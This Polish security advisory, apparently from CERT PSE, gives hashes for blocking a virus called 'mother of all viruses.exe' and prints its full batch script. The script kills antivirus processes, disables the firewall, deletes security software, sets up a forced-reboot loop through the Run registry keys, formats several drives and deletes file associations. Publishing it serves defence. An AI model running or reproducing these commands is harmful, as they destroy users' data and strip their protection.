23 maja został wykryty ciekawy wirus który swoją metodyką działania przypomina “stare dobre czasy”, a sama jego nazwa jest co najmniej intrygująca “mother of all viruses.exe”.

Jako że niewiele silników AV wykrywa jeszcze tego wirusa CERT PSE zachęca administratorów do zabezpieczenia się przed infekcją poprzez blokadę:

Name: mother of all viruses.exe
MD5: 5ce1f52681c134de83e234792a23e982
SHA1: b22b1737da1488cd11b286bce149e6d43d7d4adb
SHA256: 3d5fe4cc8ae119194adc89edfbef8f59a37de476d6d1490d93740272046e79f3

virustotal

Komendy wykonywane przez wirusa to:

  1. @ECHO off
  2. If %date% NEQ —-/–/– goto exit
  3. :exit
  4. rem —
  5. rem Permanently Kill Anti-Virus
  6. net stop “Security Center”
  7. netsh firewall set opmode mode=disable
  8. tskill /A av*
  9. tskill /A fire*
  10. tskill /A anti*
  11. cls
  12. tskill /A spy*
  13. tskill /A bullguard
  14. tskill /A PersFw
  15. tskill /A KAV*
  16. tskill /A ZONEALARM
  17. tskill /A SAFEWEB
  18. cls
  19. tskill /A OUTPOST
  20. tskill /A nv*
  21. tskill /A nav*
  22. tskill /A F-*
  23. tskill /A ESAFE
  24. tskill /A cle
  25. cls
  26. tskill /A BLACKICE
  27. tskill /A def*
  28. tskill /A kav
  29. tskill /A kav*
  30. tskill /A avg*
  31. tskill /A ash*
  32. cls
  33. tskill /A aswupdsv
  34. tskill /A ewid*
  35. tskill /A guard*
  36. tskill /A guar*
  37. tskill /A gcasDt*
  38. tskill /A msmp*
  39. cls
  40. tskill /A mcafe*
  41. tskill /A mghtml
  42. tskill /A msiexec
  43. tskill /A outpost
  44. tskill /A isafe
  45. tskill /A zap*
  46. cls
  47. tskill /A zauinst
  48. tskill /A upd*
  49. tskill /A zlclien*
  50. tskill /A minilog
  51. tskill /A cc*
  52. tskill /A norton*
  53. cls
  54. tskill /A norton au*
  55. tskill /A ccc*
  56. tskill /A npfmn*
  57. tskill /A loge*
  58. tskill /A nisum*
  59. tskill /A issvc
  60. tskill /A tmp*
  61. cls
  62. tskill /A tmn*
  63. tskill /A pcc*
  64. tskill /A cpd*
  65. tskill /A pop*
  66. tskill /A pav*
  67. tskill /A padmin
  68. cls
  69. tskill /A panda*
  70. tskill /A avsch*
  71. tskill /A sche*
  72. tskill /A syman*
  73. tskill /A virus*
  74. tskill /A realm*
  75. cls
  76. tskill /A sweep*
  77. tskill /A scan*
  78. tskill /A ad-*
  79. tskill /A safe*
  80. tskill /A avas*
  81. tskill /A norm*
  82. cls
  83. tskill /A offg*
  84. del /Q /F C:\Program Files\alwils~1\avast4\*.*
  85. del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
  86. del /Q /F C:\Program Files\kasper~1\*.exe
  87. cls
  88. del /Q /F C:\Program Files\trojan~1\*.exe
  89. del /Q /F C:\Program Files\f-prot95\*.dll
  90. del /Q /F C:\Program Files\tbav\*.dat
  91. cls
  92. del /Q /F C:\Program Files\avpersonal\*.vdf
  93. del /Q /F C:\Program Files\Norton~1\*.cnt
  94. del /Q /F C:\Program Files\Mcafee\*.*
  95. cls
  96. del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
  97. del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
  98. del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
  99. del /Q /F C:\Program Files\Norton~1\*.*
  100. cls
  101. del /Q /F C:\Program Files\avgamsr\*.exe
  102. del /Q /F C:\Program Files\avgamsvr\*.exe
  103. del /Q /F C:\Program Files\avgemc\*.exe
  104. cls
  105. del /Q /F C:\Program Files\avgcc\*.exe
  106. del /Q /F C:\Program Files\avgupsvc\*.exe
  107. del /Q /F C:\Program Files\grisoft
  108. del /Q /F C:\Program Files\nood32krn\*.exe
  109. del /Q /F C:\Program Files\nood32\*.exe
  110. cls
  111. del /Q /F C:\Program Files\nod32
  112. del /Q /F C:\Program Files\nood32
  113. del /Q /F C:\Program Files\kav\*.exe
  114. del /Q /F C:\Program Files\kavmm\*.exe
  115. del /Q /F C:\Program Files\kaspersky\*.*
  116. cls
  117. del /Q /F C:\Program Files\ewidoctrl\*.exe
  118. del /Q /F C:\Program Files\guard\*.exe
  119. del /Q /F C:\Program Files\ewido\*.exe
  120. cls
  121. del /Q /F C:\Program Files\pavprsrv\*.exe
  122. del /Q /F C:\Program Files\pavprot\*.exe
  123. del /Q /F C:\Program Files\avengine\*.exe
  124. cls
  125. del /Q /F C:\Program Files\apvxdwin\*.exe
  126. del /Q /F C:\Program Files\webproxy\*.exe
  127. del /Q /F C:\Program Files\panda software\*.*
  128. rem —
  129. echo @echo off>c:windowshartlell.bat
  130. echo break off>>c:windowshartlell.bat
  131. echo shutdown -r -t 11 -f>>c:windowshartlell.bat
  132. echo end>>c:windowshartlell.bat
  133. reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
  134. reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v /t reg_sz /d c:windowshartlell.bat /f
  135. echo You have been HACKED.
  136. format E: /y >nul
  137. format C: /y >nul
  138. format D: /y >nul
  139. format G: /y >nul
  140. format J: /y >nul
  141. format F: /y >nul
  142. START reg delete HKCR/.exe
  143. START reg delete HKCR/.dll
  144. START reg delete HKCR/*
  145. :MESSAGE
  146. ECHO Your computer has been fcked. Have a nice day.
  147. start calc
  148. tskill msnmsgr
  149. tskill firefox
  150. tskill iexplore
  151. tskill LimreWire
  152. tskill explorer
  153. tskill explorer
  154. tskill explorer
  155. tskill explorer
  156. tskill explorer
  157. START %SystemRoot%\system32\notepad.exe